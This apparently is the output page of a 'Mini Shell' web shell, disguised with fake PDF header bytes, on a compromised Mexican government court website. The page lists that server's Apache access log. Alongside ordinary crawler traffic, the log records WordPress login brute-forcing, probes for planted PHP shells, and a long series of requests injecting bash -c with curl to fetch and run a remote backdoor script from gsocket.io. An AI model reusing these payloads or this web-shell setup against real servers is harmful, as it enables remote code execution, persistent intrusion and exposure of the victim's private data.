%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/tjamichg/access-logs/
Upload File :
Create Path :
Current File : /home/tjamichg/access-logs/tjamich.gob.mx

66.249.72.137 - - [05/Feb/2025:06:36:54 -0600] "GET /sisofi/uploads/28-04-2017/NMG.pdf HTTP/1.1" 301 264 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:06:39:21 -0600] "GET /221699804 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.252.223.41 - - [05/Feb/2025:06:40:11 -0600] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
66.249.77.193 - - [05/Feb/2025:06:52:55 -0600] "GET /10154540 HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.234 - - [05/Feb/2025:06:57:09 -0600] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
114.119.128.253 - - [05/Feb/2025:06:57:40 -0600] "GET /sisofi/uploads/27-04-2017/RESOLUCION_JA-0442-2015-I_PRIMERA.pdf HTTP/1.1" 301 294 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.159.6 - - [05/Feb/2025:06:59:19 -0600] "GET /sisofi/uploads/16-06-2017/RESOLUCION_JA-0687-15-II_SEGUNDA.pdf HTTP/1.1" 301 293 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.77.192 - - [05/Feb/2025:07:06:30 -0600] "GET /166828904 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.38.110.189 - - [05/Feb/2025:07:13:12 -0600] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (compatible)"
45.130.165.165 - - [05/Feb/2025:07:13:24 -0600] "GET /geju.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
45.130.165.165 - - [05/Feb/2025:07:13:27 -0600] "GET /wp-content/plugins/about.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
45.130.165.165 - - [05/Feb/2025:07:13:29 -0600] "GET /wp.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
45.130.165.165 - - [05/Feb/2025:07:13:31 -0600] "GET /hoot.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
45.130.165.165 - - [05/Feb/2025:07:13:33 -0600] "GET /about.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
45.130.165.165 - - [05/Feb/2025:07:13:36 -0600] "GET /admin.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
66.249.72.138 - - [05/Feb/2025:07:13:52 -0600] "GET /sisofi/uploads/25-04-2017/RESOLUCION_JA-0658-2014-I_PRIMERA.pdf HTTP/1.1" 301 294 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.43 - - [05/Feb/2025:07:20:08 -0600] "GET /128369504 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.194 - - [05/Feb/2025:07:38:42 -0600] "GET /ads.txt HTTP/1.1" 301 242 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.234 - - [05/Feb/2025:07:42:31 -0600] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.234 - - [05/Feb/2025:07:42:31 -0600] "GET /robots.txt HTTP/1.1" 301 245 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
105.104.107.138 - - [05/Feb/2025:07:43:16 -0600] "POST /wp-login.php/wp-login.php HTTP/1.1" 403 - "-" "python-requests/2.32.3"
66.249.72.136 - - [05/Feb/2025:07:48:32 -0600] "GET /sisofi/uploads/30-07-2018/JA-0427-2017-II.pdf HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.234 - - [05/Feb/2025:08:27:44 -0600] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
114.119.130.13 - - [05/Feb/2025:08:30:12 -0600] "GET /sisofi/uploads/27-04-2017/RESOLUCION_JA-1115-2015-II_SEGUNDA.pdf HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.77.193 - - [05/Feb/2025:08:38:29 -0600] "GET /197305532 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
128.199.157.11 - - [05/Feb/2025:08:41:31 -0600] "POST /wp-login.php HTTP/1.1" 301 240 "http://tjamich.gob.mx/wp-login.php" "Mozilla/5.0"
66.249.77.193 - - [05/Feb/2025:08:47:27 -0600] "GET /214259000 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.193 - - [05/Feb/2025:08:56:22 -0600] "GET /34577792 HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
170.205.36.115 - - [05/Feb/2025:08:58:40 -0600] "GET /wp-login.php HTTP/1.1" 403 - "-" "python-requests/2.32.3"
170.205.36.115 - - [05/Feb/2025:08:58:40 -0600] "POST /wp-login.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.101 Safari/537.36"
66.249.77.192 - - [05/Feb/2025:09:05:17 -0600] "GET /195159668 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
170.205.36.115 - - [05/Feb/2025:09:12:41 -0600] "GET /wp-login.php HTTP/1.1" 403 - "-" "python-requests/2.32.3"
170.205.36.115 - - [05/Feb/2025:09:12:41 -0600] "POST /wp-login.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.101 Safari/537.36"
66.249.77.192 - - [05/Feb/2025:09:14:18 -0600] "GET /55481276 HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.234 - - [05/Feb/2025:09:18:07 -0600] "GET /robots.txt HTTP/1.1" 301 245 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
66.249.77.194 - - [05/Feb/2025:09:23:10 -0600] "GET /10866188 HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
165.232.125.144 - - [05/Feb/2025:09:35:03 -0600] "POST /wp-login.php HTTP/1.1" 301 240 "http://tjamich.gob.mx/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
165.232.125.144 - - [05/Feb/2025:09:35:04 -0600] "GET /wp-admin/ HTTP/1.1" 301 240 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
128.199.157.11 - - [05/Feb/2025:09:41:19 -0600] "POST /wp-login.php HTTP/1.1" 301 240 "http://tjamich.gob.mx/wp-login.php" "Mozilla/5.0"
182.3.51.30 - - [05/Feb/2025:09:46:47 -0600] "GET /wp-login.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36"
114.119.157.37 - - [05/Feb/2025:09:48:36 -0600] "GET /sisofi/uploads/09-05-2017/RESOLUCION_JA-0928-2014-II_SEGUNDA.pdf HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.72.138 - - [05/Feb/2025:09:49:12 -0600] "GET /sisofi/uploads/04-05-2017/ACRT.pdf HTTP/1.1" 301 265 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
103.204.210.59 - - [05/Feb/2025:10:33:29 -0600] "GET / HTTP/1.1" 301 231 "-" "-"
66.249.72.136 - - [05/Feb/2025:10:37:11 -0600] "GET /sisofi/uploads/16-10-2017/11.Egresos_por_clasificacion_administrativa_3092017.pdf HTTP/1.1" 301 312 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
66.249.72.136 - - [05/Feb/2025:10:38:32 -0600] "GET /sisofi/uploads/21-02-2018/JA-0917-2014-II.pdf HTTP/1.1" 301 276 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GoogleOther) Chrome/132.0.6834.159 Safari/537.36"
66.249.77.192 - - [05/Feb/2025:10:39:29 -0600] "GET /sisofi_2018/uploads/01-09-2020/ACTA_JURISDICCIONAL_-16_EXTRAORDINARIA_29-01-_2020.pdf HTTP/1.1" 301 320 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:10:39:57 -0600] "GET /87174476 HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.193 - - [05/Feb/2025:10:41:01 -0600] "GET /product/butterfly87?c=g&l=20526 HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:10:42:06 -0600] "GET /23108432 HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:10:43:13 -0600] "GET /33260336 HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.193 - - [05/Feb/2025:10:44:20 -0600] "GET /104183132 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.193 - - [05/Feb/2025:10:45:27 -0600] "GET /196163384 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.193 - - [05/Feb/2025:10:47:23 -0600] "GET /245814440 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:10:53:52 -0600] "GET /160591820 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:10:55:55 -0600] "GET /249326648 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.193 - - [05/Feb/2025:10:58:05 -0600] "GET /product/birth125?c=g&l=44975 HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:11:00:13 -0600] "GET /235532756 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.234 - - [05/Feb/2025:11:01:41 -0600] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
66.249.77.192 - - [05/Feb/2025:11:02:20 -0600] "GET /136533044 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:11:04:31 -0600] "GET /252724784 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.193 - - [05/Feb/2025:11:06:35 -0600] "GET /136100360 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:11:08:52 -0600] "GET /222037652 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:11:10:54 -0600] "GET /160864904 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.194 - - [05/Feb/2025:11:13:01 -0600] "GET /177206264 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:11:21:32 -0600] "GET /103644692 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:11:23:53 -0600] "GET /160252964 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:11:25:50 -0600] "GET /94056008 HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:11:30:05 -0600] "GET /product/sovereignty87?c=g&l=21902 HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.193 - - [05/Feb/2025:11:31:18 -0600] "GET /Eventos&ideve=6 HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
110.172.98.2 - - [05/Feb/2025:11:31:53 -0600] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
66.249.77.193 - - [05/Feb/2025:11:32:13 -0600] "GET /68320004 HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:11:42:27 -0600] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.138 - - [05/Feb/2025:11:44:32 -0600] "GET /sisofi/uploads/25-04-2017/RESOLUCION_JA-742-2014-III_TERCERA.docx.pdf HTTP/1.1" 301 300 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
140.238.28.248 - - [05/Feb/2025:11:47:54 -0600] "GET /walamachiana.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Mobile/15E148 Safari/604.1"
140.238.28.248 - - [05/Feb/2025:11:47:54 -0600] "GET /wp-includes/sodium_compat/src/Core32/Curve25519/Ge/index.php HTTP/1.1" 301 291 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
216.244.66.234 - - [05/Feb/2025:11:55:50 -0600] "GET /robots.txt HTTP/1.1" 301 245 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
84.247.145.208 - - [05/Feb/2025:11:56:27 -0600] "POST /wp-login.php HTTP/1.1" 301 240 "http://tjamich.gob.mx/wp-login.php" "Mozilla/5.0"
114.119.155.154 - - [05/Feb/2025:12:01:19 -0600] "GET /sisofi/uploads/05-07-2018/ACTA_JUNTA_ACLARACION_IR005_CAMIONETAS.pdf HTTP/1.1" 301 299 "https://www.tjamich.gob.mx/view-box_2018/contenidos.php?action=ver&ta=naf35xxviia&year=2018&tempo=14&nt=2" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.72.138 - - [05/Feb/2025:12:20:32 -0600] "HEAD /LAI/historico/informe/informe_actividades_2015.pdf HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.138.179 - - [05/Feb/2025:12:22:29 -0600] "GET /sisofi/uploads/27-04-2017/RESOLUCION_JA-206-2016-II__SEGUNDA.pdf HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
134.209.102.237 - - [05/Feb/2025:12:28:14 -0600] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:28:51 -0600] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:29:15 -0600] "GET /cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:29:27 -0600] "GET /exec.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:29:45 -0600] "GET /modules/mod_webshell/mod_webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:30:08 -0600] "GET /all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:30:41 -0600] "GET /modules/drupal_rce/drupal_rce/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:31:16 -0600] "GET /modules/ctools-8.x-3.4/ctools/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:31:30 -0600] "GET /sites/all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:31:38 -0600] "GET /blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:32:14 -0600] "GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:32:35 -0600] "GET /moodle/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:32:51 -0600] "GET /aulavirtual/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:33:10 -0600] "GET /aulavirtual/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:33:54 -0600] "GET /campus/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:34:41 -0600] "GET /campus/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:34:56 -0600] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:35:20 -0600] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:35:49 -0600] "GET /?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:36:05 -0600] "GET /?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:36:38 -0600] "GET /command.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
